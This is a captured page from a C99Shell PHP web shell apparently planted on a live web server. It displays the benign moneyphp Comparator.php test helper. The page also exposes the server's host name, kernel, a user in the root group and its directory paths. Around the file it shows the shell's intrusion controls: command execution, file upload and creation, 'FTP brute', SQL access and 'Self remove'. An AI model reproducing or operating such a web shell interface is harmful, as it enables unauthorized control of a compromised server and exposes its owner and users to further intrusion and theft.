!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/moneyphp/money/src/PHPUnit/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Comparator.php (1.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Money\PHPUnit;

use 
Money\Currencies\AggregateCurrencies;
use 
Money\Currencies\BitcoinCurrencies;
use 
Money\Currencies\ISOCurrencies;
use 
Money\Formatter\IntlMoneyFormatter;
use 
Money\Money;
use 
NumberFormatter;
use 
SebastianBergmann\Comparator\ComparisonFailure;

use function 
assert;

/**
 * The comparator is for comparing Money objects in PHPUnit tests.
 *
 * Add this to your bootstrap file:
 *
 * \SebastianBergmann\Comparator\Factory::getInstance()->register(new \Money\PHPUnit\Comparator());
 *
 * @internal do not use within your sources: this comparator is only to be used within the test suite of this library
 *
 * @psalm-suppress PropertyNotSetInConstructor the parent implementation includes factories that cannot be initialized here
 */
final class Comparator extends \SebastianBergmann\Comparator\Comparator
{
    private 
IntlMoneyFormatter $formatter;

    public function 
__construct()
    {
        
parent::__construct();

        
$currencies = new AggregateCurrencies([
            new 
ISOCurrencies(),
            new 
BitcoinCurrencies(),
        ]);

        
$numberFormatter = new NumberFormatter('en_US'NumberFormatter::CURRENCY);
        
$this->formatter = new IntlMoneyFormatter($numberFormatter$currencies);
    }

    
/** {@inheritDoc} */
    
public function accepts($expected$actual)
    {
        return 
$expected instanceof Money && $actual instanceof Money;
    }

    
/** {@inheritDoc} */
    
public function assertEquals(
        
$expected,
        
$actual,
        
$delta 0.0,
        
$canonicalize false,
        
$ignoreCase false
    
): void {
        
assert($expected instanceof Money);
        
assert($actual instanceof Money);

        if (! 
$expected->equals($actual)) {
            throw new 
ComparisonFailure($expected$actual$this->formatter->format($expected), $this->formatter->format($actual), false'Failed asserting that two Money objects are equal.');
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--